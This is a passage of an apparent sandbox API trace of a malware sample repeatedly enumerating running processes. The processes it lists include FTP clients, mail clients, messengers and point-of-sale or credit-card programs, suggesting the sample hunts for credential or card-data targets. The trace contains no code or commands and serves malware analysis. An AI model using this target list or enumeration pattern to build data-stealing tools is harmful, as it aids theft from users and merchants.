szExeFile="OfficeClickToRun.exe")) returned 1 [0215.818] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0215.822] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.824] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.826] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0215.827] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.829] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.831] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0215.832] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0215.834] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0215.836] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0215.838] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0215.839] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0215.841] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0215.842] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0215.844] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0215.846] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0215.848] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0215.849] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0215.851] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0215.853] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0215.864] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0215.867] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0215.868] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0215.870] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0215.872] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0215.873] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0215.875] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0215.877] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0215.878] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0215.881] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0215.883] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0215.885] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0215.887] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0215.889] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0215.892] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0215.894] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0215.896] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0215.906] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0215.909] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0215.912] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0215.915] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0215.918] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0215.920] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0215.922] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0215.924] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0215.926] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0215.928] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0215.930] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0215.931] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0215.933] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0215.935] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0215.938] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0215.940] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0215.947] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0215.949] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0215.951] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0215.953] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0215.955] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0215.957] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0215.960] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0215.962] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0215.965] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0215.967] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0215.969] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0215.971] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0215.974] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0215.976] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0215.978] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0215.981] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0216.010] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0216.029] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0216.032] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0216.035] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0216.054] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0216.057] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0216.060] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0216.063] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0216.067] CloseHandle (hObject=0x2198) returned 1 [0216.068] Sleep (dwMilliseconds=0x64) [0216.209] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2198 [0216.226] Process32First (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.228] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0216.230] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0216.231] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.233] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0216.236] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.239] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0216.241] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: 